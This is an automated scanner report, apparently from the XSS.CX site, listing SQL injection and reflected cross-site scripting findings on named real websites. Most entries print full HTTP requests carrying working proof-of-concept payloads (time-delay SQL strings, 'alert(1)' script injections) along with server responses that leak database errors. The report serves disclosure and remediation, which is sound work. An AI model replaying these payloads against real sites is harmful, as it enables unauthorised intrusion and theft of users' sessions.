XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10182011-05

Report generated by XSS.CX at Tue Oct 18 08:29:52 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://run.admost.com/adx/ZonePlanCounts.ashx [siteId parameter]

1.2. http://run.admost.com/adx/get.ashx [uid cookie]

2. Cross-site scripting (reflected)

2.1. http://a.collective-media.net/adj/iblocal.rubiconmcclatchy.ron/audience [REST URL parameter 2]

2.2. http://a.collective-media.net/adj/iblocal.rubiconmcclatchy.ron/audience [REST URL parameter 3]

2.3. http://a.collective-media.net/adj/iblocal.rubiconmcclatchy.ron/audience [name of an arbitrarily supplied request parameter]

2.4. http://a.collective-media.net/adj/iblocal.rubiconmcclatchy.ron/audience [sz parameter]

2.5. http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience [REST URL parameter 1]

2.6. http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience [REST URL parameter 2]

2.7. http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience [REST URL parameter 3]

2.8. http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience [sz parameter]

2.9. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [&PID parameter]

2.10. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [AN parameter]

2.11. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [ASID parameter]

2.12. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [PG parameter]

2.13. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [TargetID parameter]

2.14. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [UIT parameter]

2.15. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [destination parameter]

2.16. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [sz parameter]

2.17. http://ad.doubleclick.net/adj/iblocal.mediageneral.wspa/index [REST URL parameter 3]

2.18. http://api.bing.com/qsonhs.aspx [q parameter]

2.19. http://ar.voicefive.com/b/node_rcAll.pli [func parameter]

2.20. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

2.21. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]

2.22. http://dailymail.subscribeonline.co.uk/subscriptions [offer parameter]

2.23. http://digg.com/submit [REST URL parameter 1]

2.24. http://ds.addthis.com/red/psi/sites/www.star-telegram.com/p.json [callback parameter]

2.25. http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein [REST URL parameter 2]

2.26. http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein [name of an arbitrarily supplied request parameter]

2.27. http://gadgetbox.msnbc.msn.com/_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts [name of an arbitrarily supplied request parameter]

2.28. http://gadgetbox.msnbc.msn.com/_news/2011/04/20/6497264-mini-crossbow-shoots-flaming-firework-darts [name of an arbitrarily supplied request parameter]

2.29. http://gadgetbox.msnbc.msn.com/_vine/printer [path parameter]

2.30. http://googlev8.dealer.com/smgmap-static.htm [startingZoom parameter]

2.31. http://i.microsoft.com/en-us/homepage/bimapping.js [v parameter]

2.32. http://ib.adnxs.com/ab [cnd parameter]

2.33. http://js.revsci.net/gateway/gw.js [csid parameter]

2.34. http://m.bing.com/search/search.aspx [Q parameter]

2.35. http://m.bing.com/search/search.aspx [REDIRURL parameter]

2.36. http://player.stv.tv/favicon.ico [REST URL parameter 1]

2.37. http://player.stv.tv/search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/ [REST URL parameter 1]

2.38. http://player.stv.tv/search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/ [REST URL parameter 2]

2.39. http://player.stv.tv/search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/ [REST URL parameter 2]

2.40. http://player.stv.tv/search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/ [REST URL parameter 2]

2.41. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

2.42. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]

2.43. http://widgets.digg.com/buttons/count [url parameter]

2.44. http://ww2.startribune.com/dynamic/homes/tophomes_module.php [dart parameter]

2.45. http://ww2.startribune.com/dynamic/homes/tophomes_module.php [name of an arbitrarily supplied request parameter]

2.46. http://www.discoverbing.com/Activities/BeEntertained [name of an arbitrarily supplied request parameter]

2.47. http://www.discoverbing.com/Activities/BeHealthy [name of an arbitrarily supplied request parameter]

2.48. http://www.discoverbing.com/Activities/BePrepared [name of an arbitrarily supplied request parameter]

2.49. http://www.discoverbing.com/Activities/FindFlights [name of an arbitrarily supplied request parameter]

2.50. http://www.discoverbing.com/Activities/MakeLocalPlans [name of an arbitrarily supplied request parameter]

2.51. http://www.discoverbing.com/Activities/SocialSearch [name of an arbitrarily supplied request parameter]

2.52. http://www.discoverbing.com/facebook [name of an arbitrarily supplied request parameter]

2.53. http://www.informationweek.com/checkauth [REST URL parameter 1]

2.54. http://www.informationweek.com/checkauth [REST URL parameter 1]

2.55. http://www.informationweek.com/comment/captcha [REST URL parameter 1]

2.56. http://www.informationweek.com/comment/captcha [REST URL parameter 1]

2.57. http://www.informationweek.com/comment/captcha [REST URL parameter 2]

2.58. http://www.informationweek.com/comment/captcha [REST URL parameter 2]

2.59. http://www.informationweek.com/index/welcome [REST URL parameter 1]

2.60. http://www.informationweek.com/index/welcome [REST URL parameter 1]

2.61. http://www.informationweek.com/index/welcome [REST URL parameter 2]

2.62. http://www.informationweek.com/index/welcome [REST URL parameter 2]

2.63. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 1]

2.64. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 1]

2.65. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 2]

2.66. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 2]

2.67. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 3]

2.68. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 3]

2.69. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 4]

2.70. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 4]

2.71. http://www.lifelock.com/ [promocode parameter]

2.72. http://www.mister-wong.com/index.php [REST URL parameter 1]

2.73. http://www.nextadvisor.com/identity_theft_protection_services/index.php [REST URL parameter 1]

2.74. http://www.nextadvisor.com/identity_theft_protection_services/index.php [REST URL parameter 1]

2.75. http://www.nextadvisor.com/identity_theft_protection_services/index.php [REST URL parameter 2]

2.76. http://www.nextadvisor.com/identity_theft_protection_services/index.php [a parameter]

2.77. http://www.nextadvisor.com/identity_theft_protection_services/index.php [gclid parameter]

2.78. http://www.nextadvisor.com/identity_theft_protection_services/index.php [kw parameter]

2.79. http://www.nextadvisor.com/identity_theft_protection_services/index.php [name of an arbitrarily supplied request parameter]

2.80. http://www.nextadvisor.com/images/favicon.ico [REST URL parameter 1]

2.81. http://www.nextadvisor.com/images/favicon.ico [REST URL parameter 1]

2.82. http://www.nextadvisor.com/images/favicon.ico [REST URL parameter 2]

2.83. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

2.84. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

2.85. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]

2.86. http://www.startribune.com/business/120319724.html [name of an arbitrarily supplied request parameter]

2.87. http://www.startribune.com/share [shareURL parameter]

2.88. http://www.startribune.com/share/ [shareURL parameter]

2.89. http://www.volkswagensouthburlington.com/popups/entry.htm [REST URL parameter 1]

2.90. http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm [REST URL parameter 1]

2.91. http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm [REST URL parameter 2]

2.92. http://www.volkswagensouthburlington.com/webchat/live [action parameter]

2.93. http://www2.wspa.com/whoami/ [callback parameter]

2.94. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [1053353;167347;7653005851078549651;%5btimestamp%5d;M parameter]

2.95. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [1053353;167347;7653005851078549651;[timestamp];M parameter]

2.96. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [name of an arbitrarily supplied request parameter]

2.97. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [name of an arbitrarily supplied request parameter]

2.98. http://www4.smartadserver.com/call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no [REST URL parameter 3]

2.99. http://www4.smartadserver.com/call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no [REST URL parameter 7]

2.100. http://www4.smartadserver.com/call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no [[countgo] parameter]

2.101. http://www4.smartadserver.com/call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no [name of an arbitrarily supplied request parameter]

2.102. http://www4.smartadserver.com/call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no [[countgo] parameter]

2.103. http://www4.smartadserver.com/call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no [name of an arbitrarily supplied request parameter]

2.104. http://www.informationweek.com/news/security/attacks/229402094 [User-Agent HTTP header]

2.105. http://www.nextadvisor.com/identity_theft_protection_services/index.php [Referer HTTP header]

2.106. http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm [Referer HTTP header]

2.107. http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm [Referer HTTP header]

2.108. http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience [cli cookie]

2.109. http://ar.voicefive.com/b/node_rcAll.pli [BMX_3PC cookie]

2.110. http://ar.voicefive.com/b/node_rcAll.pli [UID cookie]

2.111. http://ar.voicefive.com/b/node_rcAll.pli [ar_p91300630 cookie]

2.112. http://ar.voicefive.com/bmx3/node.pli [BMX_3PC cookie]

2.113. http://ar.voicefive.com/bmx3/node.pli [UID cookie]

2.114. http://ar.voicefive.com/bmx3/node.pli [ar_p91300630 cookie]

2.115. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js [ruid cookie]

2.116. http://optimized-by.rubiconproject.com/a/7556/12142/21009-5.js [ruid cookie]

2.117. http://optimized-by.rubiconproject.com/a/7556/12142/21075-2.js [ruid cookie]

2.118. http://optimized-by.rubiconproject.com/a/7963/12801/23470-2.js [ruid cookie]

2.119. http://www.lifelock.com/contact/ [LifeLockEnrollment cookie]



1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://run.admost.com/adx/ZonePlanCounts.ashx [siteId parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://run.admost.com
Path:   /adx/ZonePlanCounts.ashx

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adx/ZonePlanCounts.ashx?siteId=1245waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: run.admost.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 23 Apr 2011 17:35:44 GMT
ntCoent-Length: 7025
Content-Length: 7025

<html>
<head>
<title>ORA-01722: ge&#231;ersiz say..<br></title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font
...[SNIP]...

1.2. http://run.admost.com/adx/get.ashx [uid cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://run.admost.com
Path:   /adx/get.ashx

Issue detail

The uid cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the uid cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adx/get.ashx?z=2012&lang=en&page=videodetay&categoryid=[11][16]&videoid=379705&browser=iexplorer&hq=0 HTTP/1.1
Host: run.admost.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locc={"city":"Dallas","countryCode":"US","regionName":"Texas","countryName":"United States","region":"TX"}; tco=23.04.2011 20:35:20; uid=43BD3B0296C')waitfor%20delay'0%3a0%3a20'--; sid=7242052A842

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-AspNet-Version: 4.0.30319
Set-Cookie: tco=23.04.2011 20:35:20; expires=Mon, 23-Apr-2012 17:43:00 GMT; path=/
Set-Cookie: uid=43BD3B0296C')waitfor%20delay'0%3a0%3a20'--; expires=Mon, 23-Apr-2012 17:43:00 GMT; path=/
Set-Cookie: sid=7242052A842; path=/
X-Powered-By: ASP.NET
Date: Sat, 23 Apr 2011 17:42:59 GMT
Cteonnt-Length: 269
Content-Length: 269

/*ORA-12899: de..er "ADMOST_REMOTE"."TBL_IMPRESSION1"."IMP_USR_KEY" s..tunu i..in ..ok b..y..k (as..l: 42, maksimum: 23)
ORA-06512: konum "ADMOST_REMOTE.PKG_BANNER", sat..r 749
ORA-06512: konum "ADMOST_REMOTE.PKG_BANNER", sat..r 708
ORA-06512: konum sat..r 1
[225]*/

2. Cross-site scripting (reflected)  previous
There are 119 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://a.collective-media.net/adj/iblocal.rubiconmcclatchy.ron/audience [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.rubiconmcclatchy.ron/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edbcb'-alert(1)-'c7bb2b8b2fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.rubiconmcclatchy.ronedbcb'-alert(1)-'c7bb2b8b2fd/audience;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 470
Date: Sun, 24 Apr 2011 03:11:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:05 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ronedbcb'-alert(1)-'c7bb2b8b2fd/audience;sz=300x250;net=iblocal;ord=4049553634;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.2. http://a.collective-media.net/adj/iblocal.rubiconmcclatchy.ron/audience [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.rubiconmcclatchy.ron/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a84e2'-alert(1)-'53e58deb728 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.rubiconmcclatchy.ron/audiencea84e2'-alert(1)-'53e58deb728;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 470
Date: Sun, 24 Apr 2011 03:11:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:05 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audiencea84e2'-alert(1)-'53e58deb728;sz=300x250;net=iblocal;ord=4049553634;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.3. http://a.collective-media.net/adj/iblocal.rubiconmcclatchy.ron/audience [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.rubiconmcclatchy.ron/audience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fc34'-alert(1)-'bff7e746697 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634?&3fc34'-alert(1)-'bff7e746697=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 474
Date: Sun, 24 Apr 2011 03:11:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:04 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;net=iblocal;ord=4049553634?&3fc34'-alert(1)-'bff7e746697=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.4. http://a.collective-media.net/adj/iblocal.rubiconmcclatchy.ron/audience [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.rubiconmcclatchy.ron/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1401'-alert(1)-'d01cba75e60 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634?d1401'-alert(1)-'d01cba75e60 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Date: Sun, 24 Apr 2011 03:11:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:03 GMT

